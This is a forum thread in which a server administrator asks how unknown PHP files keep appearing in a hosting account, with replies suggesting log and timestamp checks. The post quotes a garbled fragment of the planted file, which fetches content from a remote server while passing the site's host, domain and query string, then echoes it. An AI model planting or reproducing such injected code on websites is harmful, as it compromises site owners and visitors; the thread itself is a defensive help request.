Find out how files were uploaded
Hi, I am dealing with a security issue inside an account. Everyday new files are uploaded to public_html and subfolders, with strange content inside..
for example...
/home/xxx/public_html/rtrfei.php
/home/xxx/public_html/fdbs.php
content is pretty much the same on any of the files...
[PHP].$_SERVER['PHP_SELF">;
$Content_mb=file_get_contents($Remote_server."/AK47/2.html?host=".$host_name."&url=".$_SERVER['QUERY_STRING">."&domain=".$_SERVER['SERVER_NAME">);
echo $Content_mb;
?>[/PHP]
I would like to know if there is any way of finding out how this files were uploaded... (FTP, SCP, SSH, via an script on the server.. etc...)
I think this is the first step to be able to identify the root cause of this issue..
I do have root access to the server.
thanks!
-
You need to get a timestamp of when the files were placed on the server, then look for activity (cPanel access, FTP, web) around that same time. That will help lead you in the direction of how the files came to be on the server. 0 -
You would just have to check network and file access logs in the server 0 -
Hello, You may find some of the solutions on the following thread helpful: need help preventing malicious spam .php scripts Thank you. 0
Please sign in to leave a comment.
Comments
3 comments